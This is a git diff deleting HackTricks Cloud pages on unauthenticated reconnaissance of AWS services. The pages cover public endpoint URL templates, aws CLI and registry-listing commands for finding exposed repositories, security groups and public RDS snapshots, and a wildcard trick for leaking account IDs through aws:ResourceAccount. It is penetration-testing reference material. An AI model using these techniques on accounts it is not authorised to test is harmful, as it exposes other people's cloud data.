-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. - -{% code overflow="wrap" %} -```bash -aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text -``` -{% endcode %} - -{% hint style="warning" %} -This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. -{% endhint %} - -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. - -```bash -# Get image names -skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' -crane ls | sed 's/ .*//' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md deleted file mode 100644 index 1f9e1b97b..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - ECS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. - -{% code overflow="wrap" %} -```bash -# Example of detecting misconfigured security group for ECS services -aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' - -# Example of detecting a publicly accessible load balancer for ECS services -aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md deleted file mode 100644 index 8ea519bad..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ /dev/null @@ -1,65 +0,0 @@ -# AWS - Elastic Beanstalk Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information check: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### Web vulnerability - -Note that by default Beanstalk environments have the **Metadatav1 disabled**. - -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** - -### Insecure Security Group Rules - -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. - -### Publicly Accessible Load Balancer - -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. - -### Publicly Accessible S3 Buckets - -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. 
- -### Enumerate Public Environments - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md deleted file mode 100644 index 0e6f5efc9..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ /dev/null @@ -1,38 +0,0 @@ -# AWS - Elasticsearch Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://vpc-{user_provided}-[random].[region].es.amazonaws.com -https://search-{user_provided}-[random].[region].es.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md deleted file mode 100644 index 6cb420ff7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - IoT Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -mqtt://{random_id}.iot.{region}.amazonaws.com:8883 -https://{random_id}.iot.{region}.amazonaws.com:8443 -https://{random_id}.iot.{region}.amazonaws.com:443 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md deleted file mode 100644 index 0ea3e2d46..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Kinesis Video Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.kinesisvideo.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md deleted file mode 100644 index aac576119..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - Lambda Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Function URL - -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. - -### Public URL template - -``` -https://{random_id}.lambda-url.{region}.on.aws/ -``` - -### Get Account ID from public Lambda URL - -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md deleted file mode 100644 index 1d1e83f04..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - Media Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.mediaconvert.{region}.amazonaws.com -https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel -https://{random_id}.data.mediastore.{region}.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md deleted file mode 100644 index 1c748c6d4..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ /dev/null @@ -1,48 +0,0 @@ -# AWS - MQ Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Public Port - -### **RabbitMQ** - -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` - -### ActiveMQ - -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template - -``` -https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ -ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md deleted file mode 100644 index 0de37352c..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ /dev/null @@ -1,44 +0,0 @@ -# AWS - MSK Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public Port - -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). - -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template - -``` -b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com -{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md deleted file mode 100644 index fa2b1ba73..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ /dev/null @@ -1,70 +0,0 @@ -# AWS - RDS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## RDS - -For more information check: - -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} - -## Public Port - -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. - -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: - -```bash -# Public RDS snapshots -aws rds describe-db-snapshots --include-public - -## Search by account ID -aws rds describe-db-snapshots --include-public --query 'DBSnapshots[?contains(DBSnapshotIdentifier, `284546856933:`) == `true`]' -## To share a RDS snapshot with everybody the RDS DB cannot be encrypted (so the snapshot won't be encryted) -## To share a RDS encrypted snapshot you need to share the KMS key also with the account - - -# From the own account you can check if there is any public snapshot with: -aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] -## Even if in the console appear as there are public snapshot it might be public -## snapshots from other accounts used by the current account -``` - -### Public URL template - -``` -mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 -postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md deleted file mode 100644 index a6e2a448a..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Redshift Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -{user_provided}...redshift.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
